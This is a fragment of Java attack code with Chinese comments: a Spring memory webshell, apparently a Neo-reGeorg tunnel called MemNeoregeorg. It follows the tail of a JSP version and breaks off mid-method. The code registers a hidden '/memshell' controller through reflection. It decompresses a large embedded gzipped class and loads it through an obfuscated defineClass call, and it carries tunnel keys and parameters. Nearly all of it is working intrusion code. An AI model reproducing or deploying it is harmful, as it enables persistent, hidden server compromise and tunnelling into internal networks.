byte[] clazzBytes = unGzip(new byte[]{31,-117,8,0,-46,68,-86,100,0,3,-99,57,11,124,83,-11,-43,-25,36,-9,-26,-34,-92,-105,-110,6,46,112,91,74,75,11,88,-46,-44,42,104,-44,20,80,40,69,42,109,113,13,80,-47,57,9,-19,109,-119,-92,73,77,82,94,115,76,55,31,-101,-113,77,-25,54,7,78,69,-60,101,78,84,68,13,69,4,-15,-123,-50,-73,-50,109,78,-73,-87,123,-22,-26,-90,115,110,-50,61,-20,119,-50,125,-92,73,27,-10,-15,125,-65,31,-3,63,-50,-1,-4,-49,-5,127,-50,-71,-31,-103,79,31,58,4,0,39,58,36,15,-108,-64,27,18,-4,92,-126,123,-35,112,23,-4,66,-126,-5,120,-2,-91,4,111,122,64,-126,-73,36,120,91,-122,95,73,-16,107,15,65,127,35,-63,111,101,-8,-99,12,-65,-105,-31,29,9,-34,-11,64,25,-4,-127,-121,63,74,-16,-98,7,38,-62,27,60,-4,-55,3,110,-8,51,-81,-34,-25,-43,7,60,-4,-123,-121,15,-103,-58,95,-103,-20,71,-68,-6,-101,4,127,-9,64,21,99,-115,-125,-113,121,-8,7,15,-97,-56,-16,79,-58,-2,23,-29,-4,91,-122,-1,-56,-16,-87,4,-61,30,-104,-115,-64,3,74,-24,-16,64,0,-99,60,8,18,-118,30,-72,17,93,30,104,68,73,70,-39,-125,110,-12,72,88,-62,-77,-62,-61,56,62,41,-107,113,-68,-124,94,15,-106,-95,-113,-121,9,37,56,17,-43,18,-100,-124,-109,121,-104,34,-93,70,-36,-80,-100,73,86,-16,48,-107,-73,-107,60,76,35,89,-80,-54,-125,-43,56,-99,6,18,-111,-122,79,24,-91,-90,4,107,113,70,9,-50,68,85,-58,89,-116,117,-100,-116,117,124,50,91,70,63,-49,-11,60,4,120,104,-112,-15,120,9,27,61,-80,-110,76,-124,39,-32,-119,-76,-62,57,-68,125,95,-58,-71,100,17,60,-119,9,-100,44,99,80,-58,83,120,127,-86,7,98,120,26,15,33,9,-101,60,-80,22,-25,121,112,62,46,96,-56,-23,-28,33,60,-125,-39,47,-108,113,-111,-116,-51,50,46,-26,93,-117,-124,75,8,9,62,-31,-51,-103,50,46,-11,96,43,-98,-59,55,-106,-15,-86,-51,-125,-19,-40,-63,-100,-105,-53,120,54,67,62,-61,67,39,15,97,-58,90,33,-31,74,15,108,97,47,110,-63,85,50,118,-15,124,-114,-116,-85,25,-8,62,95,60,-105,-121,-13,100,-4,44,75,123,62,15,-97,99,-105,92,-32,-127,-85,112,77,9,-100,-122,17,30,-42,74,-40,-51,-112,30,9,117,9,123,61,112,13,-10,49,-18,58,9,-93,30,-72,-114,99,-29,58,-68,-112,-121,-11,108,-31,24,15,-3,60,-60,37,76,80,64,-30,0,-69,-12,34,55,-103,33,41,97,-54,13,55,-15,-100,118,-61,-51,-104,100,-76,65,62,-34,-32,-63,-115,-72,-119,-121,-51,60,108,-111,-16,-13,30,-40,-59,-78,-17,-62,-117,121,-8,-126,-124,91,37,-4,-94,7,-18,-92,0,-57,75,36,-68,84,-62,47,33,56,-12,56,13,-25,53,-45,-48,-93,-13,106,17,-126,-100,-46,83,-87,104,34,-98,66,24,-33,118,97,100,67,-92,113,48,29,-115,53,-74,71,6,-102,16,-36,-31,104,95,60,-110,30,76,18,-10,-55,-123,-89,-13,-52,109,44,18,-17,107,12,-89,-109,-47,120,95,83,30,100,-7,-38,11,-11,-18,116,-45,2,-94,-31,-102,23,-115,71,-45,11,16,-100,117,-77,87,33,8,-51,9,-26,-19,-46,47,26,-116,-60,-120,-87,90,55,-10,-38,-20,115,17,-60,-75,-63,-109,88,-36,73,117,-25,45,-102,61,-106,-105,-119,-64,-108,38,-43,-115,61,-99,-51,-102,-71,-41,-23,-111,30,61,-71,94,-33,-116,48,-85,24,82,49,-86,-98,-106,77,-35,-6,64,-38,52,-120,20,77,-59,18,-35,-111,-40,40,41,-19,-5,36,-91,103,109,108,-61,5,61,122,-73,-95,-109,-97,68,-51,67,107,-115,-89,-11,62,61,73,-62,-116,-43,-48,-70,-87,-57,115,55,-57,-30,20,37,69,122,41,-47,-8,-122,-60,122,-67,93,79,-81,75,-12,32,44,43,98,-64,-79,-62,22,-95,63,-69,-104,88,-29,-14,-119,-49,65,56,-1,-1,76,-67,57,22,73,-91,-114,-103,-97,59,25,-119,-9,44,-38,-100,-42,-55,-36,-82,-70,-42,86,67,67,-49,90,6,-84,72,-112,-38,-28,103,14,-128,86,2,70,-29,-23,21,9,11,85,-84,51,49,93,27,-12,100,-76,-105,28,-36,88,-60,65,6,100,83,99,92,79,55,-90,82,-79,-58,112,-72,45,108,-58,-70,-31,58,95,-9,58,-67,123,125,115,44,-86,19,-35,-28,96,42,-83,-109,49,67,-74,35,82,122,-9,96,50,-102,-34,-36,-40,-83,39,-45,-115,-25,-100,124,-62,105,-51,-76,-120,-10,70,-69,35,105,-67,-120,5,102,-81,-110,-16,-53,54,-47,-80,-98,36,-71,114,68,125,125,122,122,97,55,-121,-107,-34,-45,-102,74,13,-22,73,-46,-32,-72,-70,-39,-57,-60,-118,94,-24,-68,-18,-104,-15,-124,20,-56,-62,62,-124,9,69,108,-85,-64,61,112,-81,2,123,-32,62,-124,-78,49,113,-93,-32,101,120,57,-126,119,-76,-44,100,126,18,-83,-117,-104,-21,-55,-126,99,-109,-86,2,79,-61,15,17,74,13,120,52,-47,104,35,2,-31,-46,-67,-26,4,81,-113,-89,-37,-12,120,95,122,29,-95,17,-88,53,62,48,-104,38,-38,122,-92,-97,-28,-76,-17,-27,65,21,-68,2,47,87,-16,74,120,17,97,-14,104,113,22,13,70,99,61,44,-19,87,-16,-85,-92,43,94,-91,-32,-43,120,-115,-126,-41,-30,-41,20,-4,58,-33,-69,22,-81,83,-32,32,28,82,-16,122,-4,-122,2,79,-64,-109,54,27,-125,76,-18,-19,42,120,3,126,83,-63,111,-63,62,5,-65,-51,54,19,86,116,-82,108,81,-16,70,-4,-114,2,-113,-63,-29,20,64,73,61,-91,-89,77,3,-40,47,73,49,40,113,-72,-84,-20,108,99,1,-120,-60,54,-36,-114,80,-98,59,88,-102,78,15,-48,33,-87,30,39,3,25,-100,110,98,-76,-17,-30,-51,8,-43,-123,-15,-58,-72,-87,81,-56,-73,-64,67,10,-34,-118,59,40,27,82,56,74,120,-101,-126,59,-15,118,-117,-61,-56,85,35,116,-38,35,-15,-120,-31,-68,93,120,-121,-126,-33,-61,-116,-126,-33,-57,59,77,67,47,53,82,91,71,-92,-97,31,-125,106,-120,103,36,-26,-106,-8,96,-65,-98,-116,48,51,9,127,-96,-32,93,-72,91,-63,-69,-15,30,9,-17,85,112,15,-34,39,-31,94,5,-17,-57,7,20,124,16,-77,-90,-10,38,41,5,30,-127,-61,10,-18,-61,33,5,-9,-29,67,10,28,-127,-89,20,56,0,15,43,120,0,31,-106,-16,32,-101,-108,-20,-2,8,30,-106,-16,81,5,31,-61,-57,37,124,-126,-124,-79,-94,-96,-63,12,3,5,-97,100,-21,-106,-83,-96,103,-99,-22,-43,-109,13,45,-100,-31,-56,-73,10,30,-127,-61,-60,48,-107,99,-120,79,-111,71,-31,29,124,90,-63,31,-30,-45,-26,81,56,77,-59,-122,52,-86,-76,67,-121,-97,-5,-62,100,50,-78,121,-7,96,58,23,68,18,62,-93,-32,-77,-8,28,-117,116,21,93,-116,-12,-12,-40,52,-81,-90,0,-63,-25,-15,26,-124,18,-61,-63,-117,6,123,123,57,100,-91,-26,-27,29,29,45,-51,43,20,124,-127,66,0,95,-60,-105,20,124,25,95,-55,119,109,43,13,-31,68,-9,122,122,-85,61,61,116,57,-59,17,-16,35,9,95,85,-16,-57,-8,19,5,127,-118,-81,41,-80,23,-18,87,-16,103,-8,58,21,-49,-27,-53,40,-84,-106,44,108,109,-93,-44,-76,-72,53,-100,99,-16,6,-2,28,-95,-54,36,75,26,116,-81,-117,-112,-5,99,-87,70,-109,118,-77,-71,85,-16,23,-116,38,116,-74,44,92,44,-31,47,21,124,19,-33,-94,103,-127,111,43,-8,43,54,-9,-81,21,-4,13,-2,86,-63,-33,-31,-61,36,-4,-110,-27,-99,93,11,59,23,51,-25,-33,43,-8,14,31,-68,-53,62,-68,1,-33,-90,-6,55,-10,25,-79,-50,-4,-118,-2,64,98,-50,-97,-49,-85,63,34,-32,124,86,-24,61,-66,-11,30,-19,26,20,-4,19,-2,89,-63,-9,-7,-123,125,-64,-61,95,-16,67,5,-1,-54,116,63,-30,-40,-48,114,-106,-23,-48,-45,27,19,-55,-11,-100,76,-110,-67,-111,110,93,-63,-65,-31,-121,8,19,11,76,103,25,-51,-114,70,27,124,-110,109,76,-4,59,-15,-128,-3,-16,16,-62,-44,49,-34,45,-56,16,87,26,25,2,63,86,-32,5,120,81,-127,-25,-32,121,5,94,-126,-105,-87,63,25,85,100,20,-4,7,126,-94,-32,63,-15,95,10,-2,27,-1,99,103,42,3,-95,45,-63,-23,45,-17,70,120,93,34,73,25,-19,25,120,86,-127,79,-15,83,9,-121,21,7,-112,-78,14,-60,-101,21,-121,-61,-31,-76,19,-96,-15,-114,58,-87,42,37,-6,21,-121,-32,16,21,-121,-117,-93,-84,-26,127,-49,-43,118,-22,53,40,44,-115,-92,-42,81,-101,68,-63,-47,-95,39,-110,-6,-103,52,-112,64,-45,70,-91,-120,68,42,29,-89,71,-68,-118,-85,88,-108,3,117,20,2,115,-56,79,6,84,55,-118,-56,-111,39,67,46,5,82,-35,-96,-126,-71,42,18,27,-44,-115,-42,-85,-107,31,-54,-122,72,52,22,89,27,35,-120,64,-74,-90,-108,-25,-118,12,12,-24,113,90,52,28,83,-125,100,101,-24,38,-85,42,83,59,39,-89,19,118,45,-103,88,87,-76,-93,114,-89,6,-41,-90,44,-108,73,92,-31,-117,33,-71,98,86,21,81,-21,-118,35,72,27,88,-109,-27,-67,6,-115,124,12,-69,53,34,-111,54,114,125,58,74,-81,70,-94,-118,-67,-79,-63,20,-79,16,-69,99,-119,20,-31,-71,-69,19,-3,3,-111,-92,-66,34,113,-108,59,100,-78,-46,4,-103,103,36,-127,83,-66,-80,-107,-76,-54,-60,-56,25,73,-32,-91,-116,-45,73,-115,-83,-98,-54,-43,-108,18,2,45,78,-104,-39,-117,-84,94,119,46,75,-30,-119,-90,90,-29,-87,116,36,-34,77,98,76,-32,-108,56,38,14,106,-21,70,117,47,-93,81,12,-107,-90,20,-30,80,73,49,-46,-15,38,98,85,98,-108,99,-101,-55,-15,71,117,111,-79,-37,-92,-118,-64,29,7,66,-105,-43,15,-115,96,45,-45,55,91,-79,-40,52,-6,40,63,80,-101,70,-11,54,97,94,-24,-26,-77,50,68,-25,14,-62,76,-119,75,34,-35,-23,68,-110,122,-72,-102,-70,34,34,21,-32,52,-103,-26,26,13,46,98,-82,49,55,-103,103,94,-95,108,78,-60,98,-90,-33,40,101,9,-79,104,42,61,98,-92,-47,-107,-44,126,8,6,-36,-56,87,109,-124,-49,65,-103,-44,-87,-49,-29,88,-102,-112,127,-43,56,101,126,-91,-123,48,126,-110,105,-90,-103,72,114,24,-25,83,109,-75,-32,68,-44,55,22,74,-100,-42,69,82,29,-122,95,-23,41,83,-13,42,-60,-115,77,-31,-109,-53,53,-43,-66,-111,56,60,59,73,17,-100,76,111,-26,-122,-13,40,29,-14,-104,-121,50,-98,92,-109,95,111,41,-50,108,62,-108,-76,-13,79,-72,59,37,100,-85,41,23,-22,-116,-98,124,98,49,76,82,-127,50,6,-67,126,-117,-66,89,-80,-105,68,-11,88,15,-35,44,43,48,-122,-7,-19,57,-82,0,64,41,-126,62,-28,-62,-36,-78,21,34,19,-88,16,-39,-64,-15,-102,-97,-105,-83,125,113,-54,-67,-51,17,118,81,105,33,87,83,-116,78,61,53,64,33,-96,-101,31,-91,-109,-13,-44,-52,43,73,77,-26,-27,-106,100,50,-111,-76,-75,-55,-17,-91,55,83,-101,-33,-49,-23,-107,67,-93,59,49,-80,-103,63,-24,-58,-6,-91,-75,8,-56,-80,-121,64,-90,-89,-5,50,37,-93,-108,110,124,-13,8,-100,118,56,-86,-19,100,115,-44,70,-126,115,103,-54,0,112,16,-26,-27,38,19,-85,-87,-8,-9,-79,-23,-122,81,-72,-28,-94,110,51,-101,81,-119,-82,27,77,-55,-86,-29,-26,-43,50,66,-20,-115,-10,-47,-117,94,68,31,-56,-21,-115,-36,94,71,-71,-83,-104,-76,58,-65,51,46,58,35,18,59,-115,100,120,-22,127,-1,-76,-4,111,95,-115,-50,62,22,119,86,17,2,69,-47,93,73,-67,63,-79,65,-73,-65,21,-30,86,-21,97,55,-121,114,36,-58,-97,-7,92,59,-90,-28,-118,75,33,82,19,31,21,61,-32,42,33,26,-98,-49,89,-108,17,44,-46,84,107,-12,72,50,-33,53,-71,67,34,89,-110,78,-28,90,32,106,-72,70,126,-23,24,-61,92,-24,-115,69,-23,13,40,-108,6,58,-11,-2,8,37,103,54,121,69,93,115,-79,26,109,-35,9,28,99,73,-73,89,-44,25,-82,21,83,3,49,-50,-4,-59,-46,69,-63,47,25,-71,-46,76,90,-84,-92,46,34,105,62,51,-87,-49,44,103,-108,7,104,53,-70,117,76,-79,-102,-7,-49,55,63,-51,-110,1,73,-65,118,122,-79,45,49,-67,-97,62,42,8,-69,-124,19,-99,-75,53,-117,70,94,-77,-55,-28,74,45,126,-71,-2,-45,-54,51,-83,102,106,50,26,-59,60,-5,-113,116,-113,92,-81,-93,-87,-123,-87,20,-1,-60,69,-31,-71,36,-103,-24,-25,-116,58,6,-49,-56,-73,43,86,-97,-35,66,113,95,-124,-56,25,69,12,53,-10,-9,-112,124,-10,73,-67,-105,-33,68,-93,-39,35,52,89,101,-68,-40,25,-1,-40,-109,-30,-97,14,72,74,-93,109,27,-105,50,127,74,-80,-9,46,-13,-25,26,-124,-45,-118,-68,-123,99,-3,13,70,98,27,-101,121,-89,-50,48,-100,-101,1,70,82,-121,-23,112,23,-108,-128,3,118,-61,-35,-32,-92,-7,30,-72,23,-128,-26,61,112,31,-51,110,-2,32,2,-124,7,12,-40,-125,-32,-93,117,22,-10,-47,56,68,-112,50,-102,-111,102,-47,79,16,70,-25,95,14,-24,11,-64,60,118,-67,5,46,56,-114,-26,-117,-21,15,-125,-125,-2,-75,7,-100,115,58,2,-62,-100,-112,-32,15,-120,115,14,-125,-109,-2,61,8,-76,113,-47,70,-92,127,15,-126,43,32,-47,90,-54,-126,28,20,3,-78,-67,116,5,-68,46,123,45,5,-68,-116,-30,14,-55,1,111,14,-63,29,-16,-70,-19,-75,39,-32,-11,-40,-21,-110,-128,-73,-60,94,43,66,112,-100,24,44,117,5,-57,75,65,-81,28,44,-13,-70,-126,62,-81,20,-100,64,-21,-119,94,119,80,-43,4,-97,-57,121,16,74,-122,64,57,12,-29,66,-109,-68,117,-76,9,77,54,-89,41,-66,-46,-112,70,127,-27,13,-66,-15,57,36,-55,-92,-20,-72,21,-18,-94,-93,-118,6,-97,55,119,84,22,-102,-86,77,-51,-126,47,88,-87,86,58,118,-128,43,3,-89,-88,-107,15,-53,-95,105,-38,84,109,90,22,38,-104,-80,-38,3,48,113,-11,62,80,-75,-118,44,76,58,0,-18,-43,-38,-76,125,48,-103,-42,89,-104,18,-86,-56,12,63,-94,122,-124,29,16,-46,42,-100,106,73,22,-76,-112,-90,85,48,106,-71,-86,-12,24,51,-61,-54,-75,10,62,-84,8,-47,-111,-45,62,-27,-125,10,63,-17,-90,-122,42,-75,74,-43,61,4,-107,67,48,45,52,57,99,32,78,-30,-109,-22,44,76,-41,-120,83,13,15,-75,-50,-35,-38,100,117,-94,97,88,34,116,-60,113,5,109,85,99,75,-118,-8,102,100,97,-26,54,80,12,-118,-77,-74,59,-94,-116,-117,97,70,-95,81,-16,29,103,-23,-35,-43,-32,-85,-53,-103,-64,29,-86,60,0,-77,87,107,21,-5,-64,79,122,-109,-42,20,6,-127,80,-107,86,-91,85,102,-95,65,-85,18,-78,112,-68,-81,81,-85,-54,-62,9,-37,-128,-26,-61,-48,-24,-49,-62,-119,-66,57,67,48,55,84,-83,85,-93,112,16,78,90,-19,-12,-121,49,11,39,27,-57,26,-55,28,-52,-62,41,13,-66,83,115,108,78,99,-44,33,8,-123,-90,107,-45,-121,-96,73,-101,-66,31,-26,33,-124,106,-76,-102,-3,48,31,97,27,-52,-31,-43,2,4,-106,-88,-74,-63,119,58,81,45,89,-19,-44,106,-61,-106,-108,51,72,-96,-38,33,56,67,35,37,23,102,-122,-97,41,-18,-31,21,44,-25,-94,80,77,6,-92,16,25,-53,118,-100,70,-50,-14,-109,29,76,3,55,103,97,49,1,-76,114,-53,-123,-75,90,109,22,90,-120,67,-115,54,-61,-87,-51,56,-108,-123,37,90,77,22,-50,-28,97,41,19,108,-35,15,103,-15,-117,89,86,32,-15,89,-7,18,107,-75,71,32,-88,-43,-6,-38,-78,-48,-66,29,2,-76,-22,48,86,53,44,118,22,-106,19,117,-63,119,-74,104,43,-75,90,-48,102,-80,102,93,-103,-31,-67,-52,-31,51,101,120,-35,78,24,-57,-53,78,-106,126,38,-81,-62,-52,-20,41,-48,-24,-26,10,-45,28,-86,72,10,24,-9,-100,-69,-53,4,-96,72,-99,113,0,86,-110,-118,-85,66,51,89,122,10,-39,-43,-63,90,-78,-61,52,-75,-106,14,103,-79,62,-77,-100,42,-39,-83,75,-101,-87,-51,-54,-62,57,-103,-31,-41,-75,-103,89,88,77,103,-126,-17,92,83,30,95,27,-53,67,-89,-27,67,112,-98,65,125,-124,-93,33,-100,-51,-108,34,-110,-80,62,59,58,34,5,-33,-7,118,100,21,19,-107,-20,94,106,-121,-24,17,-4,-104,-74,-29,-115,109,37,69,-20,-25,40,98,-73,3,7,-86,-49,-128,77,-93,-43,4,94,13,-63,5,-63,-86,33,88,-61,97,-109,-123,-56,1,88,75,-81,78,-83,-38,7,-35,101,37,67,89,-24,-47,-86,-99,89,-48,-69,-10,66,-81,86,-87,85,-17,-121,62,39,-87,56,69,-11,-6,-42,-123,51,-104,34,58,-68,-114,-122,105,42,-29,-104,-82,38,-24,-7,-60,-17,66,-125,95,-125,113,109,63,-84,119,-112,-13,98,102,-44,71,-78,-48,-97,1,49,84,101,-99,-59,29,-48,-107,-63,-39,116,39,97,-36,-71,107,-52,-99,35,-80,81,117,13,-63,0,-67,-107,105,108,-90,-117,-126,-43,-86,20,-100,-18,12,-42,-40,62,-87,85,-85,111,-127,78,-75,-102,-3,-60,24,73,-118,46,-89,90,-51,-34,-88,101,103,-99,-61,-64,84,-105,90,-93,86,-81,9,-46,-96,-70,110,3,15,-19,-90,-33,6,94,-110,124,28,71,78,58,-100,-127,-15,57,6,-103,-31,123,109,45,97,18,49,-50,-45,-78,-54,-48,18,54,-110,-60,-125,-122,-60,-3,-93,37,-98,-84,-114,-77,50,56,63,-17,67,44,58,89,-105,47,110,-24,98,43,111,52,-58,77,-37,-96,-108,-8,-47,106,51,69,-25,7,57,118,-45,-118,-80,-77,13,-89,-47,-21,-102,82,-16,-70,-14,34,36,3,85,-102,-111,54,-3,-102,76,-103,-50,72,-99,5,-57,66,-69,115,55,21,-73,103,-15,42,-68,22,-86,28,79,56,-98,117,-68,0,85,-62,22,-31,41,-31,25,-102,63,17,81,20,-96,74,108,16,-17,22,-9,-48,-4,-90,107,-86,-85,10,-86,-88,-120,-19,114,109,-122,42,-68,-61,-15,50,-49,-114,87,-100,119,-13,-20,-68,71,8,-14,44,-100,-30,-38,-64,-77,81,-19,14,-64,-61,102,-75,-61,73,32,-126,76,-77,-25,0,108,33,39,125,-66,-67,-2,-48,2,103,80,80,-123,-54,-99,-16,81,-67,42,92,38,-32,-36,50,24,-34,26,20,9,-76,3,-22,3,-2,7,64,80,69,-15,-30,-109,-78,112,113,-105,-75,115,109,-107,54,-103,123,-33,23,-78,-80,-75,43,3,-5,-13,-81,-70,-116,-85,45,71,-67,-86,-70,-54,-32,-125,-83,-46,-59,-105,-28,29,-72,-68,-29,-73,-118,54,-47,47,-102,68,123,-14,-119,74,-1,15,114,-86,84,6,-121,-73,122,93,5,71,-110,-9,-12,-83,-58,54,51,-84,4,-78,112,-55,30,-85,35,56,8,-121,44,27,-7,64,0,15,-51,-82,122,-54,-117,-19,-127,67,11,56,-96,43,-9,-63,-91,33,-63,73,118,17,-55,84,-17,16,41,87,64,21,47,19,113,-18,92,82,-104,97,110,-43,-27,-72,117,-8,93,26,-115,-78,-7,100,1,-118,100,-95,72,6,-118,100,-94,-20,-44,72,82,22,-45,123,2,-53,-97,-123,47,89,-8,65,89,-107,-67,-13,119,-128,91,-93,-14,-109,-34,-61,-108,84,-103,-95,38,17,74,-11,-61,-81,-47,104,16,57,95,99,-99,-58,-77,33,100,-17,-68,-83,98,1,29,-73,-22,30,77,-57,-51,80,-109,-114,-37,-96,-29,54,-23,80,107,-95,-54,46,-78,-42,38,-43,-51,36,50,-61,83,-52,91,-122,125,100,-2,97,-98,-102,43,110,-88,82,100,31,23,-51,125,-66,-46,54,-65,-17,-53,89,-72,-116,-115,100,71,-47,-46,-128,74,-51,-109,104,-43,-98,122,-82,52,-94,-109,8,81,17,-70,-36,-40,-48,-70,-62,44,61,109,121,72,76,-57,-128,-111,-57,51,-61,67,-11,78,2,-106,11,-36,35,-104,2,60,74,127,2,57,-120,3,-6,49,120,-36,18,101,61,117,-125,18,-51,23,112,17,-81,-89,26,-98,-123,43,-38,-121,-32,-54,-114,-122,-3,-16,21,-82,82,103,-46,-30,-85,92,-92,-82,10,9,-84,-50,-43,33,81,19,-83,-77,58,94,25,-121,-41,-124,92,-102,-21,81,-72,118,27,-108,105,-82,44,124,-115,-30,-30,-21,-37,64,20,118,103,-122,95,-51,12,103,-23,125,22,-118,-32,-26,-1,-13,-79,-38,-53,107,-23,69,81,-76,-64,-91,70,15,-42,-18,92,-32,63,20,20,36,-54,121,-82,3,112,-35,106,-22,57,-81,15,73,-107,-86,-80,19,34,26,85,-23,111,4,69,77,-46,92,78,-51,69,117,-10,-122,46,-115,50,-24,55,73,83,-71,-121,93,78,-105,-36,116,-22,118,106,110,-29,-76,-110,96,107,-42,44,80,69,97,23,53,76,-94,-41,125,59,76,32,-49,26,61,-104,-101,18,9,-91,37,55,-19,53,119,56,51,124,107,-64,-76,-109,-101,-1,-53,-60,18,-19,106,18,-105,-83,-77,-47,-17,-108,-67,19,-121,-32,91,97,-65,-9,56,107,101,37,105,-110,-73,-46,127,104,39,116,-6,43,-25,28,-127,37,52,-78,-99,30,5,-9,54,-54,-63,2,85,34,110,13,-60,12,-43,102,-63,-54,-99,98,-96,-110,3,76,19,15,-79,-36,107,-122,-32,-37,-108,-55,105,-53,-43,-107,-114,93,-105,57,-55,127,-9,4,-116,-56,65,-24,-124,62,-72,-48,112,-102,-101,-1,27,-49,114,91,-52,-118,-96,53,-127,67,7,-31,-58,14,35,116,2,36,-59,50,-114,-99,44,124,39,36,-6,36,-90,-72,109,27,-108,-20,-123,-19,44,-64,12,-33,77,35,-112,-17,50,-60,-25,-69,-39,-126,-56,123,-31,-106,-112,-40,-96,10,-102,24,54,-62,-25,1,127,125,67,96,8,110,29,29,58,110,-2,-31,-35,-110,-31,68,10,29,-106,97,-90,-97,25,-110,-46,-11,36,-13,14,14,-113,44,-36,-74,-99,-98,12,7,-22,78,77,-12,55,100,-31,-10,-79,-124,-98,-125,-25,45,43,31,79,-124,68,-102,-87,-18,-19,34,-109,-34,-47,30,-88,40,-17,17,-42,100,-31,123,-27,107,22,112,59,45,4,56,-14,50,-102,96,123,-24,5,120,-47,-70,123,-118,-15,53,3,80,-17,119,25,105,-50,47,26,-109,87,-34,116,-119,95,48,-105,94,90,58,-51,-27,-108,77,-105,-52,-85,-40,109,17,121,9,94,-74,-120,-100,78,66,49,-111,-71,20,117,109,-11,-82,114,-58,-67,126,69,-67,88,-18,-107,-73,88,107,-95,-36,-21,-75,-41,-50,114,-17,20,123,109,39,-65,87,-32,71,22,-79,82,-102,-99,52,59,-124,-35,-42,-39,-85,-16,99,-53,100,-29,-24,-113,-49,-84,-81,40,-37,28,63,-95,-65,-97,30,11,-46,107,-16,-77,-47,-33,100,-44,57,125,-33,-50,48,-81,-25,62,-39,38,27,-6,0,-108,28,-128,59,-55,-92,63,-72,31,122,77,106,-16,63,-22,-91,95,93,55,37,0,0});
Class clazz = loader(clazzBytes);
namespace.put(charslist, clazz.newInstance());
}
namespace.get(charslist).equals(args);
%>修改后如下
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import java.util.*;
import javax.crypto.*;
import javax.crypto.spec.*;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import java.io.IOException;
import java.lang.reflect.Method;
public class MemNeoregeorg {
public MemNeoregeorg() throws Exception {
WebApplicationContext context = (WebApplicationContext) RequestContextHolder.
currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
// 从当前上下文环境中获得 RequestMappingHandlerMapping 的实例 bean
RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
// 通过反射获得自定义 controller 中唯一的 Method 对象
Method method = Class.forName("org.springframework.web.servlet.handler.AbstractHandlerMethodMapping").getDeclaredMethod("getMappingRegistry");
// 属性被 private 修饰,所以 setAccessible true
method.setAccessible(true);
// 通过反射获得该类的test方法
Method method2 = MemNeoregeorg.class.getMethod("test");
// 定义该controller的path
PatternsRequestCondition url = new PatternsRequestCondition("/memshell");
// 定义允许访问的HTTP方法
RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();
// 在内存中动态注册 controller
RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);
// 创建用于处理请求的对象,避免无限循环使用另一个构造方法
MemNeoregeorg injectToController = new MemNeoregeorg("aaa");
// 将该controller注册到Spring容器
mappingHandlerMapping.registerMapping(info, injectToController, method2);
}
private MemNeoregeorg(String aaa) {
}
public static java.util.Map<String, Object> namespace = new java.util.HashMap<String, Object>();
public static byte[] unGzip(byte[] bytes) throws Exception {
java.io.ByteArrayOutputStream out = new java.io.ByteArrayOutputStream();
java.io.ByteArrayInputStream in = new java.io.ByteArrayInputStream(bytes);
java.util.zip.GZIPInputStream ungzip = new java.util.zip.GZIPInputStream(in);
byte[] buffer = new byte[256];
int n;
while ((n = ungzip.read(buffer)) >= 0)
out.write(buffer, 0, n);
return out.toByteArray();
}
public static Class loader(byte[] bytes) throws Exception {
java.net.URLClassLoader classLoader = new java.net.URLClassLoader(new java.net.URL[0], Thread.currentThread().getContextClassLoader());
java.lang.reflect.Method method = ClassLoader.class.getDeclaredMethod(new String(new byte[]{100, 101, 102, 105, 110, 101, 67, 108, 97, 115, 115}), new Class[]{byte[].class, int.class, int.class});
method.setAccessible(true);
Class clazz = (Class) method.invoke(classLoader, new Object[]{bytes, new Integer(0), new Integer(bytes.length)});
return clazz;
}
public void test() throws IOException {
// 获取request和response对象
HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();
HttpServletResponse response = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getResponse();
HttpSession session = request.getSession();
//exec
try {
String charslist = "ymvx0PzraRgGsoLkAJ3TjC7EwNO4H/B1b6Mlq9W5+ncfZFiQ8KUpdtXVYDIu2She";
Object[] args = new Object[]{
request, //0
response, //1
charslist.toCharArray(), //2
new byte[]{-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 40, -1, -1, -1, 29, 4, 31, 60, 18, 27, 39, 33, 22, 48, 37, -1, -1, -1, -1, -1, -1, -1, 16, 30, 21, 57, 23, 45, 11, 28, 58, 17, 49, 14, 34, 25, 26, 5, 47, 9, 61, 19, 50, 55, 38, 54, 56, 44, -1, -1, -1, -1, -1, -1, 8, 32, 42, 52, 63, 43, 10, 62, 46, 20, 15, 35, 1, 41, 13, 51, 36, 7, 12, 53, 59, 2, 24, 3, 0, 6, -1, -1, -1, -1, -1},//3
new Integer(200),//4
new Integer(513),//5
new Integer(524288),//6
"kv0FG3mxOl9jNCNn4E9TOr6RN79wwjSTBCmaNxyKJlJ5HXnVJlmNojNNCl/UsXYtBECEOjPxLP98Tdtt7W0fs5ntN3SaHCoVJqNJor9COqRUBlmGoT/nJV6zgdDiHrCoavdFkb==",//7
new Integer(274876949),//8
new Integer(0),//9
new Integer(0),//10
new Integer(0),//11
};
if (namespace.get(charslist) == null) {
